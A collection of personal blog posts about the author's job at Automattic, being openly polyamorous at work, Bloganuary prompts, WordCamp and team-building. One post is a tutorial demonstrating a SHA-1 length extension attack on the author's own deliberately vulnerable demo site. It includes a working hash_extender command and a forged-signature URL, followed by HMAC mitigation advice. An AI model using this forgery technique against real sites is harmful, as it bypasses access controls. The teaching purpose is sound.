Out as Poly at Work

During one of the periods today that Facebook wasn’t down, a friend who makes use of the platform shared a Facebook post with me, which read:

Has anyone informed work/colleagues about being ENM and how was it received?

I’ve informed a few colleagues but I am considering informing my team as part of my Team Champion and EDI role.

I’ve been “out” at every one of the employers1 since I entered into my first open/nonmonogamous relationship a couple of decades ago.

I didn’t do so immediately: in fact, I waited almost until the point that coming out was an academic necessity! The point at which it was only a matter of time before somebody thought they’d caught us “cheating”… or else because I didn’t want to have to lie to coworkers about e.g. from whom a romantic gift might have come.

Laptop and mug alongside a notebook and pencil. In the notebook is written "TODO: 1. Come out to colleagues. 2. ???. 3. Profit."
I guess I’ll squeeze in “come out to colleagues” in between the project planning meeting and working on rolling out the server upgrades.

Here’s how it went to be “out” at each of the three full-time jobs I’ve held over that period:

SmartData

We lived and worked in and around a small town, and in our small tight-knit team we all had a reasonable handle on what was going on in one another’s personal lives. By the time I was actively in a relationship with Ruth (while still in a relationship with Claire, whom all my coworkers had met at e.g. office parties and the like), it just seemed prudent to mention it, as well as being honest and transparent.

Dan with coworkers and friends drinking in a pub.
This photograph – featuring some of my coworkers – was taken in 2005. At that point, they probably all thought of me as a regular, normal person. At least, as far as my relationship structure was concerned. Not in any other way. Obviously.

It went fine. And it made Monday watercooler conversations about “who what I did at the weekend” simpler. Being a small team sharing a single open-plan office meant that I was able to mention my relationship status to literally the entire company at once, and everybody took it with a shrug of noncommittal acceptance.

The Bodleian Libraries

The Bodleian Libraries was a much bigger beast, and in turn a part of the massive University of Oxford. It was big enough to have a “LGBT+ Staff” network within its Equality and Diversity unit, within which – because of cultural intersections2 – I was able to meet a handful of other poly folk at the University.

Dan poses with Bodleian coworkers in front of a party feast in a low-ceilinged office.
This motley crew were exactly as warm and accepting a bunch as you could ask for.

I mentioned very early on – as soon as it came up organically – the structure of the relationship I was in, and everybody was cool (or failing that, at least professional) about it. Curious coworkers asked carefully-crafted questions, and before long (and following my lead) my curious lifestyle choices were as valid a topic for light-hearted jokes as anything else in that fun and gossipy office.

And again: it paid-off pragmatically, especially when I took parental leave after the birth of each of our two kids3.

It also helped defuse a situation when I was spotted by a more-distant coworker on my way back from a lunchtime date with a lover who wasn’t Ruth, and my confused colleague introduced herself to the woman that she assumed must’ve been the partner she’d heard about. When I explained that no, this is a different person I’m seeing my colleague seemed taken aback, and I was glad to be able to call on a passing coworker who knew me better to back me up in my assertion that no, this wasn’t just me trying to lie to cover some illicit work affair! Work allies are useful.

Automattic

I’ve been with Automattic for four and a half years now, and this time around I went one step further in telling potential teammates about my relationship structure by mentioning it in my “Howdymattic” video – a video introduction new starters are encouraged to record to say hi to the rest of the company4.

Framegrab from Dan's Howdymattic video showing him making a "V" shape with his fingers alongside a diagram of his V-shaped relationship.
Some full-on MSPaint grade titling made it into that video, didn’t it?

A convenient side-effect of this early coming-out was that I found myself immediately inducted into the “polymatticians” group – a minor diversity group within Automattic, comprising a massive 1.2% of the company, who openly identify as engaging in nonmonogamous relationships5!

That was eye-opening. Not only does Automattic have a stack of the regular inclusivity groups you might expect from a big tech company (queer, Black, women, trans, neurodiverse) and a handful of the less-common ones (over-40s, cancer survivors, nondrinkers, veterans), they’ve also got a private group for those of us who happen to be both Automatticians and in (or inclined towards) polyamorous relationships. Mind blown.

My relationship structure’s been… quietly and professionally accepted. It doesn’t really come up (why would it? in a distributed company it has even less-impact on anything than it did in my previous non-distributed roles)… outside of the “polymatticians” private space.

In summary: I can recommend being “out” at work. So long as you’d feel professionally safe to do so: relationship structure isn’t necessarily a protected characteristic (it’s complicated), and even if it were you might be careful about mentioning it in some environments. It’s great to have the transparency to not have to watch your words when a coworker asks about “your partner”. Plus being free to be emotionally honest at work is just good for your mental wellbeing, in my opinion! If you trust your coworkers, be honest with them. If you don’t… perhaps you need to start looking for a better job?

Footnotes

1 I’m not counting my freelance work during any of those periods, although I’ve been pretty transparent with them too.

2 Let’s be clear: most queer folks, just like most straight folks, seem to be similarly-inclined towards monogamy. But ethnical non-monogamy in various forms seems to represent a larger minority within queer communities than outside them. There’s all kinds of possible reasons for this, and smarter people than me have written about them, but personally I’m of the opinion that, for many, it stems from the fact that by the time you’re societally-forced to critically examine your relationships, you might as well go the extra mile and decide whether your relationship structure is right for you too. In other words: I suspect that cis hetro folks would probably have a proportional parity of polyamory if they weren’t saturated with media and cultural role models that show them what their relationship “should” look like.

3 Unwilling to lie, I made absolutely clear that I was neither the father of either of them nor the husband of their mother (among other reasons, the law prohibits Ruth from marrying me on account of being married to JTA), but pointed out that my contract merely stipulated that I was the partner of a birth parent, which was something I’d made completely clear since I first started working there. I’m not sure if I was just rubber-stamped through the University’s leave process as a matter of course or if they took a deeper look at me and figured “yeah, we’re not going to risk picking a legal fight with that guy”, but I got my leave granted.

4 If you enjoyed my “Howdymattic”, you’ll probably also love the outtakes.

5 There are dozens of us! Dozens!

Laptop and mug alongside a notebook and pencil. In the notebook is written "TODO: 1. Come out to colleagues. 2. ???. 3. Profit."× Dan with coworkers and friends drinking in a pub.× Dan poses with Bodleian coworkers in front of a party feast in a low-ceilinged office.× Framegrab from Dan's Howdymattic video showing him making a "V" shape with his fingers alongside a diagram of his V-shaped relationship.×

Automattic Shakeup

My employer Automattic‘s having a bit of a reorganisation. For unrelated reasons, this coincides with my superteam having a bit of a reorganisation, too, and I’m going to be on a different team next week than I’ve been on for most of the 4+ years I’ve been there1. Together, these factors mean that I have even less idea than usual what I do for a living, right now.

Dan, wearing an Oxford-branded t-shirt, shrugs and looks confused in front of a screen showing Automattic's "Work With Us" page.
What is it I do here again? Something something code WooCommerce something something marketplace awesome something, right?

On the whole, I approve of Matt‘s vision for this reorganisation. He writes:

Each [Automattic employee] gets a card: Be the Host, Help the Host, or Neutral.

You cannot change cards during the course of your day or week. If you do not feel aligned with your card, you need to change divisions within Automattic.

“Be the Host” folks are all about making Automattic’s web hosting offerings the best they possibly can be. These are the teams behind WordPress.com, VIP, and Tumblr, for example. They’re making us competitive on the global stage. They bring Automattic money in a very direct way, by making our (world class) hosting services available to our customers.

“Help the Host” folks (like me) are in roles that are committed to providing the best tools that can be used anywhere. You might run your copy of Woo, Jetpack, or (the client-side bit of) Akismet on Automattic infrastructure… or alternatively you might be hosted by one of our competitors or even on your own hardware. What we bring to Automattic is more ethereal: we keep the best talent and expertise in these technologies close to home, but we’re agnostic about who makes money out of what we create.

A laptop computer on a desk, showing a WordPress wp-admin page.
This stock photo confuses me so much that I had to use it. It’s WordPress, as seen in Chrome on Windows Vista… but running on a MacBook Air. The photographer has tried to blur their site domain name (but it’s perfectly readable), but hasn’t concealed the fact they’re running µTorrent in the background (for Obviously Legal Reasons, I’m sure). Weird. But the important thing is that, crazy as this person’s choices are, they can use Automattic’s software however they like. It’s cool.

Anyway: I love the clarification on the overall direction of the company… but I’m not sure how we market it effectively2. I look around at the people in my team and its sister teams, all of us proudly holding our “Help the Hosts” cards and ready to work to continue to make Woo an amazing ecommerce platform wherever you choose to host it.

And obviously I can see the consumer value in that. It’s reassuring to know that the open source software we maintain or contribute to is the real deal and we’re not exporting a cut-down version nor are we going to try to do some kind of rug pull to coerce people into hosting with us. I think Automattic’s long track record shows that.

But how do we sell that? How do we explain that “hey, you can trust us to keep these separate goals separate within our company, so there’s never a conflict of interest and you getting the best from us is always what we want”? Personally, seeing the inside of Automattic, I’m convinced that we’re not – like so much of Big Tech – going to axe the things you depend upon3 or change the terms and conditions to the most-exploitative we can get away with4 or support your business just long enough to be able to undermine and consume it 5.

In short: I know that we’re the “good guys”. And I can see how this reorganisation reinforces that. But I can’t for the life of me see how we persuade the rest of the world of the fact6.

Any ideas?

Footnotes

1 I’ve been on Team Fire for a long while, which made my job title “Code Magician on Fire”, but now I’ll be on Team Desire which isn’t half as catchy a name but I’m sure they’ll make up for it by being the kinds of awesome human beings I’ve become accustomed to working alongside at Automattic.

2 Fortunately they pay me to code, not to do marketing.

3 Cough… Google.

4 Ahem… Facebook.

5 ${third_coughing_sound}… Amazon.

6 Seriously, it’s a good thing I’m not in marketing. I’d be so terrible at it. Also public relations. Did I ever tell you the story about the time that, as a result of a mix-up, I accidentally almost gave an interview to the Press Office at the Vatican? A story for another time, perhaps

Dan, wearing an Oxford-branded t-shirt, shrugs and looks confused in front of a screen showing Automattic's "Work With Us" page.× A laptop computer on a desk, showing a WordPress wp-admin page.×

[Bloganuary] Dream Job

This post is part of my attempt at Bloganuary 2024. Today’s prompt is:

What’s your dream job?

It feels like a bit of a cop-out to say I’m already doing it, but that’s true. Well, mostly (read on and I’ll make a counterpoint!).

Automattic

Dan (wearing a rainbow bandana) waves at the camera; behind him are four work colleagues, and behind that the Colosseum in Rome.
Getting to hang out with my awesome teammates in various locations around the globe is a plus.

I’m incredibly fortunate that my job gets to tick so many of the boxes I’d put on a “dream job wishlist”:

  • I work on things that really matter. Automattic’s products make Web publishing and eCommerce available to the world without “lock-in” or proprietary bullshit. I genuinely believe that Automattic’s work helps to democratise the Internet and acts, in a small way, as a counterbalance to the dominance of the big social media silos.
  • I get to make the world a better place by giving away as much intellectual property as possible. Automattic’s internal policy is basically “you don’t have to ask to open source something; give away anything you like so long as it’s not the passwords”.1 Open Source is one of the most powerful ideas of our generation, and all that.
  • We work in a distributed, asynchronous way. I work from where I want, when I want. I’m given the autonomy to understand what my ideal working environment is and make the most of it. Some mornings I’m just not feeling that coding flow, so I cycle somewhere different and try working the afternoon in a different location. Some weekends I’m struck by inspiration and fire up my work laptop to make the most of it, because, y’know, I’m working on things that really matter and I care about them.
  • I work with amazing people who I learn from and inspire me. Automattic’s home to some incredibly talented people and I love that I’ve managed to find a place that actively pushes me to study new things every day.
  • Automattic’s commitment to diversity & inclusion is very good-to-excellent. As well as getting work work alongside people from a hundred different countries and with amazingly different backgrounds, I love that I get to work in one of the queerest and most queer-affirming environments I’ve ever been paid to be in.

Did I mention that we’re hiring?2

Three Rings

Dan sits at a boardroom table in an airy, bright room. He's wearing an Automattic t-shirt that reads "Let's make the Web a better place." In the background, several other people discuss a pile of post-it notes that have begun to pile up on the table.
I don’t know how I managed to select a photo of my fun-loving kickass volunteers that’s somehow more dry and corporate than the photo of my work colleagues above.

But you know where else ticks all of those boxes? My voluntary work with Three Rings. Let me talk you through that wishlist again:

  • I work on things that really matter. We produce the longest-running volunteer management system in the world3 We produce it as volunteers ourselves, because we believe that volunteering matters and we want to make it as easy as possible for as many people as possible to do as much good as possible, and this allows us to give it away as cheaply as possible: for free, to the smallest and poorest charities.
  • I get to make the world a better place by facilitating the work of suicide helplines, citizens advice bureaus, child support services, environmental charities, community libraries and similar enterprises, museums, theatres,  charity fundraisers, and so many more good works. Back when I used to to helpline volunteering I might do a three hour shift and help one or two people, and I was… okay at it. Now I get to spend those three hours making tools that facilitate many tens of thousands of volunteers to provide services that benefit an even greater number of people across six countries.
  • We work in a distributed, asynchronous way. Mostly I work from home; sometimes we get together and do things as a team (like in the photo above). Either way, I’m trusted with the autonomy to produce awesome things in the way that works best for me, backed with the help and support of a team that care with all their hearts about what we do.
  • I work with amazing people who I learn from and inspire me. I mentioned one of them yesterday. But seriously, I could sing the praises of any one of our two-dozen strong team, whether for their commitment to our goals, their dedication to making the world better, their passion for quality and improvement, their focus when producing things that meet our goals, or their commitment to sticking with us for years or decades, without pay, simply because they know that what we do is important and necessary for so many worthy causes. And my fellow development/devops volunteers continue to introduce me to new things, which scratches my “drive-to-learn” itch.
  • Three Rings’ commitment to diversity & inclusion is very good, and improving. We skew slightly queer and have moderately-diverse gender mix, but I’m especially impressed with our age range these days: there’s at least 50 years between our oldest and youngest volunteers with a reasonably-even spread throughout, which is super cool (and the kind of thing many voluntary organisations dream of!).

The difference

The biggest difference between these two amazing things I get to work on is… only one of them pays me. It’s hard to disregard that.

Sometimes at Automattic, I have to work on something that’s not my favourite project in the world. Or the company’s priorities clash with my own, and I end up implementing something that my gut tells me isn’t the best use of my time from a “make the world a better place” perspective. Occasionally they take a punt on something that really pisses me off.

That’s all okay, of course, because they pay me, and I have a mortgage to settle. That’s fine. That’s part of the deal.

My voluntary work at Three Rings is more… mine. I’m the founder of the project; I 100% believe in what it’s trying to achieve. Even though I’ve worked to undermine the power of my “founder privilege” by entrusting the organisation to a board and exec that I know will push back and challenge me, I feel safe fully trusting that everything I give to Three Rings will be used in the spirit of the original mission. And even though I might sometimes disagree with others on the best way forward, I accept that whatever decision is made comes from a stronger backing than if I’d acted alone.

Three Rings, of course, doesn’t pay me4. That’s why I can only give them a few hours a week of my time. If I could give more, I would, but I have bills to pay so my “day job” is important too: I’m just so incredibly fortunate that that “day job” touches upon many of the same drives that are similarly satisfied by my voluntary work.

If I didn’t have bills to pay, I could happily just volunteer for Three Rings. I’d miss Automattic, of course: there are some amazing folks there whom I love very much, and I love the work. But if they paid me as little as Three Rings did – that is, nothing! – I’d choose Three Rings in a heartbeat.

But man, what a privileged position I’m in that I can be asked what my dream job is and I can answer “well, it’s either this thing that I already do, or this other thing that I already do, depending on whether this hypothetical scenario considers money to be a relevant factor.” I’m a lucky, lucky man.

Footnotes

1 I’m badly-paraphrasing Matt, but you get the gist.

2 Automattic’s not hiring as actively nor voraciously as it has been for the last few years – a recent downtown in the tech sector which you may have seen have heavily affected many tech companies has flooded the market with talent, and we’ve managed to take our fill of them – we’re still always interested to hear from people who believe in what we do and have skills that we can make use of. And because we’re a community with a lot of bloggers, you can find plenty of first-hand experiences of our culture online if you’d like to solicit some opinions before you apply…

3 Disclaimer: Three Rings is the oldest still-running volunteer management system we’re aware of: our nearest surviving “competitor”, which provides similar-but-different features for a price that’s an order of magnitude greater, launched later in the same year we started. But maybe somebody else has been running these last 22 years that we haven’t noticed, yet: you never know!

4 Assuming you don’t count a Christmas dinner each January – yes, really! (it turns out to be cheaper to celebrate Christmas in January) – as payment.

Dan (wearing a rainbow bandana) waves at the camera; behind him are four work colleagues, and behind that the Colosseum in Rome.× Dan sits at a boardroom table in an airy, bright room. He's wearing an Automattic t-shirt that reads "Let's make the Web a better place." In the background, several other people discuss a pile of post-it notes that have begun to pile up on the table.×

[Bloganuary] Leadership

This post is part of my attempt at Bloganuary 2024. Today’s prompt is:

What makes a good leader?

I pretty-much answered this in an RSS Only post about a year ago, while talking about the things I’m worst at when I’m a leader, and that I therefore admired in others (along with specific examples of real people I’d worked under). The features I picked out that I admired were:

  • An ability to keep track of all the moving parts in and around a team,
  • The courage to demonstrate and encourage emotional honesty in professional environments, and
  • A keenness to proactively support the people you lead.
A flotilla of paper boats on a table: a red boat leads the way ahead of two blue and two green boats.
An ability to fold origami watercraft is also a bonus in a good leader.

(Incidentally, did you know that I publish some of my posts “RSS Only”: that is, they don’t show up on my homepage, generally don’t appear in my social feeds, etc. The only way to know when one is published is to subscribe to my blog using RSS, or one of the other mechanisms by which my “RSS Only” content gets shared, e.g. email…)

Email no more than

Anyway: I haven’t changed my mind in the last year – for me personally, the qualities I look for in a leader are those that compensate for the things at which I’m weakest. I want a leader that can pull me, push me ahead, point the way, or just hang back and let me explore, depending on what the situation demands. And I still stick by the list I wrote a year ago.

A flotilla of paper boats on a table: a red boat leads the way ahead of two blue and two green boats.×

Magician Roles

Because I work somewhere hip enough to let people tweak their job titles, mine is “Code Magician”.

Employee directory photocard showing "Dan Q, Code Magician on Fire (Woo), started Oct 18th, 2019".

LinkedIn isn’t as hip as Automattic, though. That’s why they keep emailing me sector updates… for the “Magician” sector… 😅

Email from LinkedIn with the subject "Hiring trends for Magician roles".

Employee directory photocard showing "Dan Q, Code Magician on Fire (Woo), started Oct 18th, 2019".× Email from LinkedIn with the subject "Hiring trends for Magician roles".×

Length Extension Attack Demonstration

Prefer to watch/listen than read? There’s a vloggy/video version of this post in which I explain all the key concepts and demonstrate an SHA-1 length extension attack against an imaginary site.

I understood the concept of a length traversal attack and when/how I needed to mitigate them for a long time before I truly understood why they worked. It took until work provided me an opportunity to play with one in practice (plus reading Ron Bowes’ excellent article on the subject) before I really grokked it.

Would you like to learn? I’ve put together a practical demo that you can try for yourself!

Screenshot of vulnerable site with legitimate "download" link hovered.
For the demonstration, I’ve built a skeletal stock photography site whose download links are protected by a hash of the link parameters, salted using a secret string stored securely on the server. Maybe they let authorised people hotlink the images or something.

You can check out the code and run it using the instructions in the repository if you’d like to play along.

Using hashes as message signatures

The site “Images R Us” will let you download images you’ve purchased, but not ones you haven’t. Links to the images are protected by a SHA-1 hash1, generated as follows:

Diagram showing SHA1 being fed an unknown secret key and the URL params "download=free" and outputting a hash as a "download key".
The nature of hashing algorithms like SHA-1 mean that even a small modification to the inputs, e.g. changing one character in the word “free”, results in a completely different output hash which can be detected as invalid.

When a “download” link is generated for a legitimate user, the algorithm produces a hash which is appended to the link. When the download link is clicked, the same process is followed and the calculated hash compared to the provided hash. If they differ, the input must have been tampered with and the request is rejected.

Without knowing the secret key – stored only on the server – it’s not possible for an attacker to generate a valid hash for URL parameters of the attacker’s choice. Or is it?

Changing download=free to download=valuable invalidates the hash, and the request is denied.

Actually, it is possible for an attacker to manipulate the parameters. To understand how, you must first understand a little about how SHA-1 and its siblings actually work:

SHA-1‘s inner workings

  1. The message to be hashed (SECRET_KEY + URL_PARAMS) is cut into blocks of a fixed size.2
  2. The final block is padded to bring it up to the full size.3
  3. A series of operations are applied to the first block: the inputs to those operations are (a) the contents of the block itself, including any padding, and (b) an initialisation vector defined by the algorithm.4
  4. The same series of operations are applied to each subsequent block, but the inputs are (a) the contents of the block itself, as before, and (b) the output of the previous block. Each block is hashed, and the hash forms part of the input for the next.
  5. The output of running the operations on the final block is the output of the algorithm, i.e. the hash.
Diagram showing message cut into blocks, the last block padded, and then each block being fed into a function along with the output of the function for the previous block. The first function, not having a previous block, receives the IV as its secondary input. The final function outputs the hash.
SHA-1 operates on a single block at a time, but the output of processing each block acts as part of the input of the one that comes after it. Like a daisy chain, but with cryptography.

In SHA-1, blocks are 512 bits long and the padding is a 1, followed by as many 0s as is necessary, leaving 64 bits at the end in which to specify how many bits of the block were actually data.

Padding the final block

Looking at the final block in a given message, it’s apparent that there are two pieces of data that could produce exactly the same output for a given function:

  1. The original data, (which gets padded by the algorithm to make it 64 bytes), and
  2. A modified version of the data, which has be modified by padding it in advance with the same bytes the algorithm would; this must then be followed by an additional block
Illustration showing two blocks: one short and padded, one pre-padded with the same characters, receiving the same IV and producing the same output.
A “short” block with automatically-added padding produces the same output as a full-size block which has been pre-populated with the same data as the padding would add.5
In the case where we insert our own “fake” padding data, we can provide more message data after the padding and predict the overall hash. We can do this because we the output of the first block will be the same as the final, valid hash we already saw. That known value becomes one of the two inputs into the function for the block that follows it (the contents of that block will be the other input). Without knowing exactly what’s contained in the message – we don’t know the “secret key” used to salt it – we’re still able to add some padding to the end of the message, followed by any data we like, and generate a valid hash.

Therefore, if we can manipulate the input of the message, and we know the length of the message, we can append to it. Bear that in mind as we move on to the other half of what makes this attack possible.

Parameter overrides

“Images R Us” is implemented in PHP. In common with most server-side scripting languages, when PHP sees a HTTP query string full of key/value pairs, if a key is repeated then it overrides any earlier iterations of the same key.

Illustration showing variables in a query string: "?one=foo&two=bar&one=baz". When parsed by PHP, the second value of "one" ("baz") only is retained.
Many online sources say that this “last variable matters” behaviour is a fundamental part of HTTP, but it’s not: you can disprove is by examining $_SERVER['QUERY_STRING'] in PHP, where you’ll find the entire query string. You could even implement your own query string handler that instead makes the first instance of each key the canonical one, if you really wanted.6
It’d be tempting to simply override the download=free parameter in the query string at “Images R Us”, e.g. making it download=free&download=valuable! But we can’t: not without breaking the hash, which is calculated based on the entire query string (minus the &key=... bit).

But with our new knowledge about appending to the input for SHA-1 first a padding string, then an extra block containing our payload (the variable we want to override and its new value), and then calculating a hash for this new block using the known output of the old final block as the IV… we’ve got everything we need to put the attack together.

Putting it all together

We have a legitimate link with the query string download=free&key=ee1cce71179386ecd1f3784144c55bc5d763afcc. This tells us that somewhere on the server, this is what’s happening:

Generation of the legitimate hash for the (unknown) secret key a string download=free, with algorithmic padding shown.
I’ve drawn the secret key actual-size (and reflected this in the length at the bottom). In reality, you might not know this, and some trial-and-error might be necessary.7
If we pre-pad the string download=free with some special characters to replicate the padding that would otherwise be added to this final8 block, we can add a second block containing an overriding value of download, specifically &download=valuable. The first value of download=, which will be the word free followed by a stack of garbage padding characters, will be discarded.

And we can calculate the hash for this new block, and therefore the entire string, by using the known output from the previous block, like this:

The previous diagram, but with the padding character manually-added and a second block containing "&download=valuable". The hash is calculated using the known output from the first block as the IV to the function run over the new block, producing a new hash value.
The URL will, of course, be pretty hideous with all of those special characters – which will require percent-encoding – on the end of the word ‘free’.

Doing it for real

Of course, you’re not going to want to do all this by hand! But an understanding of why it works is important to being able to execute it properly. In the wild, exploitable implementations are rarely as tidy as this, and a solid comprehension of exactly what’s happening behind the scenes is far more-valuable than simply knowing which tool to run and what options to pass.

That said: you’ll want to find a tool you can run and know what options to pass to it! There are plenty of choices, but I’ve bundled one called hash_extender into my example, which will do the job pretty nicely:

$ docker exec hash_extender hash_extender \
    --format=sha1 \
    --data="download=free" \
    --secret=16 \
    --signature=ee1cce71179386ecd1f3784144c55bc5d763afcc \
    --append="&download=valuable" \
    --out-data-format=html
Type: sha1
Secret length: 16
New signature: 7b315dfdbebc98ebe696a5f62430070a1651631b
New string: download%3dfree%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e8%26download%3dvaluable

I’m telling hash_extender:

  1. which algorithm to use (sha1), which can usually be derived from the hash length,
  2. the existing data (download=free), so it can determine the length,
  3. the length of the secret (16 bytes), which I’ve guessed but could brute-force,
  4. the existing, valid signature (ee1cce71179386ecd1f3784144c55bc5d763afcc),
  5. the data I’d like to append to the string (&download=valuable), and
  6. the format I’d like the output in: I find html the most-useful generally, but it’s got some encoding quirks that you need to be aware of!

hash_extender outputs the new signature, which we can put into the key=... parameter, and the new string that replaces download=free, including the necessary padding to push into the next block and your new payload that follows.

Unfortunately it does over-encode a little: it’s encoded all the& and = (as %26 and %3d respectively), which isn’t what we wanted, so you need to convert them back. But eventually you end up with the URL: http://localhost:8818/?download=free%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e8&download=valuable&key=7b315dfdbebc98ebe696a5f62430070a1651631b.

Browser at the resulting URL, showing the "valuable" image (a pile of money).
Disclaimer: the image you get when you successfully exploit the test site might not actually be valuable.

And that’s how you can manipulate a hash-protected string without access to its salt (in some circumstances).

Mitigating the attack

The correct way to fix the problem is by using a HMAC in place of a simple hash signature. Instead of calling sha1( SECRET_KEY . urldecode( $params ) ), the code should call hash_hmac( 'sha1', urldecode( $params ), SECRET_KEY ). HMACs are theoretically-immune to length extension attacks, so long as the output of the hash function used is functionally-random9.

Ideally, it should also use hash_equals( $validDownloadKey, $_GET['key'] ) rather than ===, to mitigate the possibility of a timing attack. But that’s another story.

Footnotes

1 This attack isn’t SHA1-specific: it works just as well on many other popular hashing algorithms too.

2 SHA-1‘s blocks are 64 bytes long; other algorithms vary.

3 For SHA-1, the padding bits consist of a 1 followed by 0s, except the final 8-bytes are a big-endian number representing the length of the message.

4 SHA-1‘s IV is 67452301 EFCDAB89 98BADCFE 10325476 C3D2E1F0, which you’ll observe is little-endian counting from 0 to F, then back from F to 0, then alternating between counting from 3 to 0 and C to F. It’s considered good practice when developing a new cryptographic system to ensure that the hard-coded cryptographic primitives are simple, logical, independently-discoverable numbers like simple sequences and well-known mathematical constants. This helps to prove that the inventor isn’t “hiding” something in there, e.g. a mathematical weakness that depends on a specific primitive for which they alone (they hope!) have pre-calculated an exploit. If that sounds paranoid, it’s worth knowing that there’s plenty of evidence that various spy agencies have deliberately done this, at various points: consider the widespread exposure of the BULLRUN programme and its likely influence on Dual EC DRBG.

5 The padding characters I’ve used aren’t accurate, just representative. But there’s the right number of them!

6 You shouldn’t do this: you’ll cause yourself many headaches in the long run. But you could.

7 It’s also not always obvious which inputs are included in hash generation and how they’re manipulated: if you’re actually using this technique adversarily, be prepared to do a little experimentation.

8 In this example, the hash operates over a single block, but the exact same principle applies regardless of the number of blocks.

9 Imagining the implementation of a nontrivial hashing algorithm, the predictability of whose output makes their HMAC vulnerable to a length extension attack, is left as an exercise for the reader.

Screenshot of vulnerable site with legitimate "download" link hovered.× Browser at the resulting URL, showing the "valuable" image (a pile of money).×

WCEU23 – Contributor Day

Among the many perks of working for a company with a history so tightly-intertwined with that of the open-source WordPress project is that license to attend WordCamps – the biggest WordPress conferences – is basically a given.

Dan, wearing an Automattic "Let's make the Web a better place" t-shirt, stands in front of a banner welcoming attendees to WordCamp Europe Athens 2023.
So yeah, right now I’m in Athens for WordCamp Europe 2023.

It’s frankly a wonder that this is, somehow, my first WordCamp. As well as using it1 and developing atop it2, of course, I’ve been contributing to WordPress since 2004 (albeit only in a tiny way, and not at all for most of the last decade!).

A table placeholder labelled "WP-CLI". It and s handful of Coke cans and disposable coffee cups are picked-out in colour on an otherwise monochrome and blurred picture.
If you already know what WP-CLI is… let’s be friends.

Today is Contributor Day, a pre-conference day in which folks new and old get together in person to hack on WordPress and WordPress-adjacent projects. So I met up with Cem, my Level 4 Dragonslayer friend, and we took an ultra-brief induction into WP-CLI3 before diving in to try to help write some code.

Dan takes a selfie from a round table covered in laptops, with people hacking at them.
Contributor Days are about many things, but perhaps their biggest value comes from lowering the barrier to becoming a new contributor to an open-source project by sitting you right next to somebody who already knows it well.

So today, as well as meeting some awesome folks, I got to write an overly-verbose justification for a bug report being invalid and implement my first PR for WP-CLI: a bugfix for a strange quirk in output formatting.

Screenshot showing a user running `wp plugin update --all --no-color` but the output putting the word "Success" in green.
The bug I fixed is slightly hard to describe (and even harder to explain why it matters), but here’s a summary: when you run a WP-CLI command that first displays a table and then the result, the result is likely to always appear in colour even if you specify --no-color.

I hope to be able to continue contributing to WP-CLI. I learned a lot about it today, and while I don’t use it as much as I used to in my multisite-management days, I still really respect its power as a tool.

MacBook showing an Automattic "Work For Us" web page, alongside a bottle of Corona Extra. A rooftop terrace garden and swimming pool can be seen in the background.
Did I mention lately how awesome my employers are? I promise my blog’s not always gonna be me shilling for them… but today it is.

Footnotes

1 Even with the monumental stack of custom code woven into DanQ.me, a keen eye will probably spot that it’s WordPress-powered.

2 Perhaps my proudest “built on WordPress” moment was my original implementation of OpenID for WordPress, back in 2005, which is completely obsolete now. But I’ve done plenty of other things, both useful (like the multisite installation used by the University of Oxford) and pointless (like making WordPress a CMS for Gemini, Gopher, and Finger) too over the last 20 years.

3 WP-CLI is… it’s like Drush but for WordPress, if that makes sense to you? If not: it’s a multifaceted command-line tool for installing, configuring, maintaining, and managing WordPress installations, and I’ve been in love with it for years.

Dan, wearing an Automattic "Let's make the Web a better place" t-shirt, stands in front of a banner welcoming attendees to WordCamp Europe Athens 2023.× A table placeholder labelled "WP-CLI". It and s handful of Coke cans and disposable coffee cups are picked-out in colour on an otherwise monochrome and blurred picture.× Dan takes a selfie from a round table covered in laptops, with people hacking at them.× Screenshot showing a user running `wp plugin update --all --no-color` but the output putting the word "Success" in green.× MacBook showing an Automattic "Work For Us" web page, alongside a bottle of Corona Extra. A rooftop terrace garden and swimming pool can be seen in the background.×

Have Fun with Missions, Visions, and Values

I just spent a lightweight week in Rome with fellow members of Automattic‘s Team Fire.

Among our goals for the week was an attempt to strengthen the definition of who are team are, what we work on, and how and why we do so. That’s basically a team-level identity, mission, vision, and values, right?

In front of the Colosseum in Rome, Dan - wearing a rainbow-striped bandana atop which his sunglasses are perched - takes a selfie. Behind him stand a man with dark hair and a closely-trimmed beard wearing a purple "woo" t-shirt, a woman with long brown hair wearing beads and a multicoloured dress, a man wearing spectacles and a dark t-shirt on which the number "23" can be made out, and a man in sunglasses with a ginger beard, wearing an open blue shirt.
We were missing two members of our team, but one was able to remote-in (the other’s on parental leave!).

Fellow Automattician Ben Dwyer recently wrote about his experience of using a deck of Dixit cards to help his team refine their values in a fun and engaging way. I own a Dixit set, so we decided to give it a go too.

A deck of Dixit cards, bound by a twisted elastic band, sits on a flight itinerary for the journey "LGW to FCO" taking place on May 21, 2023 and costing $367.60.
The cards sat on my ‘plane tickets for a fortnight because it was just about the only way I’d remember to pack them.

Normally when you play Dixit, you select a card from your hand – each shows a unique piece of artwork – and try to describe it in a way that’s precise enough that some of the other players will later be able to pick it out of a line-up, but ambiguous enough that not all the other players will. It’s a delicate balancing act. Even when our old Geek Night was in full swing we didn’t used to play it often because our well-established group’s cornucopia of  in-jokes and references  made it trivially easy to “target” your descriptions at specific players1, but it’s still a solid icebreaker activity.

A trio of Dixit cards within a grid of nine. From left to right, they show: a heart, on fire, beneath a glass jar; a cubbyhole containing childrens' toys; a fairy leaping from a book towards a small person atop a stack of books.
Can you see your team’s values symbolised in any Dixit cards?

Perhaps it was the fantasy artwork that inspired us or maybe it just says something about how my team sees themselves, but what we came up with had a certain… swords-and-sorcery… even Dungeons & Dragons… feel to it.

Partial screenshot from a document entitled "Team Fire". The visible part is titled "Who we are (identity)" and reads:We are a band of brave adventurers who bring light into the wild forests of Extend. We tame the monsters who lurk in the dungeons beneath the Castle of Vendor Experience. The beasts we keep at bay include: PBS, which helps ensure code quality and extension standards compliance; the Vendor Dashboard, haunt of third-party developers, as well as their documentation and analytics platforms; Integrations with Payments Admin, to ensure that treasure is shared, and other tools.
The projects my team are responsible for aren’t actually monsters, but they can be complex, multifaceted, and unintuitive. And have a high AC.

Ou team’s new identity isn’t finalised, but I love the fact that we’ve been able to inject a bit of fun and whimsy into it. At our last draft, my team looks to be defined as comprising:

  • Gareth, level 62 Pathfinder, leading the way through the wilds
  • Bero, Level 5 Battlesmith, currently lost in the void
  • Dan (me!), Level 5 Arcane Trickster, breaking locks and stealing treasure
